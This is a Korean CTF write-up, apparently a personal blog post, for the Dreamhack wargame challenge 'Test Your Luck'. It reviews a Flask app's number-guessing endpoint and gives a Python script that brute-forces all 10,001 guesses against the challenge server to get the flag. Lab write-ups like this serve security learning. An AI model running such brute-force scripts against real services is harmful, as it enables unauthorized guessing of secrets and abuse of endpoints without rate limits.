Test Your Luck

2026. 2. 19. 20:42·Dreamhack 워게임/Lv.1
반응형

문제설명

Test Your Luck~🍀

 

숫자를 맞히고 플래그를 찾아주세요!

 

플래그 형식은 DH{...} 입니다.


코드분석

NUMBER_RANGE = (0, 10000)
TARGET_NUMBER = random.randint(*NUMBER_RANGE)
  • 0~10000까지 랜덤한 숫자 TARGET_NUMBER 변수에 삽입
@app.route('/')
def index():
    return render_template('index.html', range=NUMBER_RANGE)
  • 메인화면엔 index.html 템플릿 렌더링해서 보여줌
@app.route('/guess', methods=['POST'])
def guess_number():
    user_guess = int(request.form['guess'])
    
    if user_guess == TARGET_NUMBER:
        return jsonify({"result": "Correct", "flag": flag()})
    else:
        return jsonify({"result": "Incorrect", "flag": "Try again~!"})
  • guess를 사용자로부터 입력받음 (정수만)
  • 맞추면 플래그 아니면 Try again 출력

익스플로잇

걍 0 ~ 10000까지 브루트포싱 해보면 된다.

import requests
from tqdm import tqdm

URL = "http://host3.dreamhack.games:21041"

for i in tqdm(range(10001)):
    response = requests.post(URL + "/guess", data={'guess':str(i)})
    result = response.json()

    if result["result"] == "Correct":
        print(f"Number")
        print(result)
        break

 

반응형

'Dreamhack 워게임 > Lv.1' 카테고리의 다른 글

Really Not SQL  (0) 2026.02.23
ez_race  (0) 2026.02.20
My Best Friend  (0) 2026.02.19
Hangul - Revenge  (0) 2026.02.19
Ctrl-C  (0) 2026.02.19
'Dreamhack 워게임/Lv.1' 카테고리의 다른 글
  • Really Not SQL
  • ez_race
  • My Best Friend
  • Hangul - Revenge
y3onbug5
y3onbug5
y3onbug5 님의 블로그 입니다.
  • y3onbug5
    y3onbug5 님의 블로그
    y3onbug5
  • 전체
    오늘
    어제
    • 분류 전체보기 (167) N
      • Alpacahack (19) N
      • Dreamhack 워게임 (49)
        • Lv.1 (40)
        • Lv.0 (4)
        • LV.2 (3)
        • LV.3 (2)
      • [Dreamhack] Web Beginner (3)
      • [Dreamhack] Web Hacking (17)
        • 웹 기초 지식 (4)
        • Cookie & Session (2)
        • Cross-Site Scripting(XSS) (1)
        • Cross-Site Request Forgery (1)
        • SQL Injection (4)
        • NoSQL Injection (2)
        • Command Injection (1)
        • File Vulnerability (1)
        • Server-Side Request Forgery (1)
      • [Dreamhack] Web Hacking Client-Side (10)
        • XSS Filtering Bypass (2)
        • Content Security Policy (CSP) (2)
        • CSRF,CORS Bypass (2)
        • Client-Side Template Injection (CSTI) (1)
        • CSS Injection (1)
        • Relative Path Overwrite (RPO) (1)
        • DOM Vulnerability (1)
      • [Dreamhack] Web Hacking Server-Side (15)
        • SQL Injection Advanced (4)
        • SQL Injection Advanced - Fingerprinting (2)
        • NoSQL Injection Advanced (3)
        • Command Injection Advanced - Web Servers (3)
        • File Vulnerability Advanced - Web Server (3)
      • [Dreamhack]Black-Box Penetration Testing (15)
        • DreamCommunity Penetration Testing (11)
      • [Dreamhack] LLM (2)
        • [Dreamhack] LLM과 프롬프트 엔지니어링 (2)
      • Web 공부 (4)
      • Web Study (15)
      • JavaScript (17)
        • 기초 (12)
        • 중급 (4)
      • 웹 개발(Flask) (0)
      • [Security First] web 기초교육 (1) N
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    JavaScript
    xss
    web
    cve
    드림핵
    webstudy
    alpacahack
    hacking
    LLM
    JS
    CSRF
    DreamHack
    webhacking
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.5
y3onbug5
Test Your Luck
상단으로

티스토리툴바